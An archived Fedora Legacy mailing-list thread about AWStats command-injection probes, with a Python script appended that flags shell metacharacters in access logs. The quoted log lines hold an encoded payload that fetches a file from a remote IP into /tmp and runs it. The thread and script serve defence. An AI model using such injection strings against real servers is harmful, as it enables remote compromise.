Re: slapper worm


 



I don't remember for sure if this will work, but it may be possible to do something like this:

mount --bind /tmp /tmp -o noexec

I think that will now enforce the noexec on /tmp without having to create a new partition for tmp.


			Will.

Michael Mansour wrote:
Hi Kelson,


Michael Mansour wrote:

220.135.223.35 - - [23/Jan/2006:08:33:02 +1100] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo| HTTP/1.1" 403 344 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
220.135.223.35 - - [23/Jan/2006:08:33:03 +1100] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo| HTTP/1.1" 404 340 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"

...

Are there any updates FL can do to any of the packages to fix/block
slapper from an FC1 machine?

You might also want to make sure you're using a current version of
AWStats.  IIRC this flaw was fixed in either 6.3 or 6.4, and the current
version is 6.5.


Yeah, I run awstats 6.5 on that system.


(If you don't have awstats.pl on your system, then these lines are just probes and aren't relevant to your problem.)

More generally, I read advice somewhere that mounting /tmp with the "noexec" option (and making any other temp directories symbolic links to that one) can make this type of attack much more difficult.


Definitely noted as one of the measures to stop this type of attack, but for
this particular server, /tmp is not a mounted filesystem but part of /, so I
can't really do that without re-partitioning the disk and creating a dedicated
/tmp.

Thanks.

Michael.

--

fedora-legacy-list@xxxxxxxxxx
https://www.redhat.com/mailman/listinfo/fedora-legacy-list
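
An added example, not part of the original messages: a small triage script that decodes each query parameter in an Apache access log, flags values carrying shell metacharacters like the `configdir` requests quoted above, and separates rejected probes (4xx) from requests the server answered. The sample lines are constructed, use documentation addresses, and the verdict names are assumptions of this sketch.

```python
import re
from urllib.parse import unquote_plus

# Apache "combined" format: host ident user [time] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
# Characters a directory or config name never needs but a shell acts on.
SHELL_META = re.compile(r'[|;`&<>]|\$\(')

# Constructed sample input (not taken from a real server).
SAMPLE_LOG = [
    '198.51.100.7 - - [23/Jan/2006:08:33:02 +1100] "GET /awstats/awstats.pl'
    '?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bid;echo%20YYY;echo| HTTP/1.1"'
    ' 403 344 "-" "Mozilla/4.0"',
    '198.51.100.7 - - [23/Jan/2006:08:33:03 +1100] "GET /cgi-bin/awstats.pl'
    '?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bid;echo%20YYY;echo| HTTP/1.1"'
    ' 200 5120 "-" "Mozilla/4.0"',
    '203.0.113.5 - - [23/Jan/2006:09:10:11 +1100] "GET /cgi-bin/awstats.pl'
    '?config=example.org&lang=en HTTP/1.1" 200 5120 "-" "Mozilla/4.0"',
]

def triage(line):
    """Return a finding dict for a request with shell metacharacters, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path, _, query = m["target"].partition("?")
    hits = []
    # Split on '&' only: the payload itself uses ';' as a command separator.
    for pair in query.split("&"):
        name, _, raw = pair.partition("=")
        value = unquote_plus(raw)  # %2f -> '/', %3b -> ';', %20 -> ' '
        if SHELL_META.search(value):
            hits.append((name, value))
    if not hits:
        return None
    status = int(m["status"])
    # 4xx: script absent or access denied, so the request was only a probe.
    # Anything else reached a handler and deserves a closer look.
    verdict = "rejected-probe" if status >= 400 else "investigate"
    return {"host": m["host"], "path": path, "status": status,
            "verdict": verdict, "params": hits}

if __name__ == "__main__":
    for entry in SAMPLE_LOG:
        finding = triage(entry)
        if finding:
            print(finding["verdict"], finding["host"], finding["path"], finding["params"])
```

An "investigate" verdict only means the request was served; with a patched AWStats the parameter may have been sanitised, so follow up by checking /tmp and the process list rather than treating it as proof of compromise.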
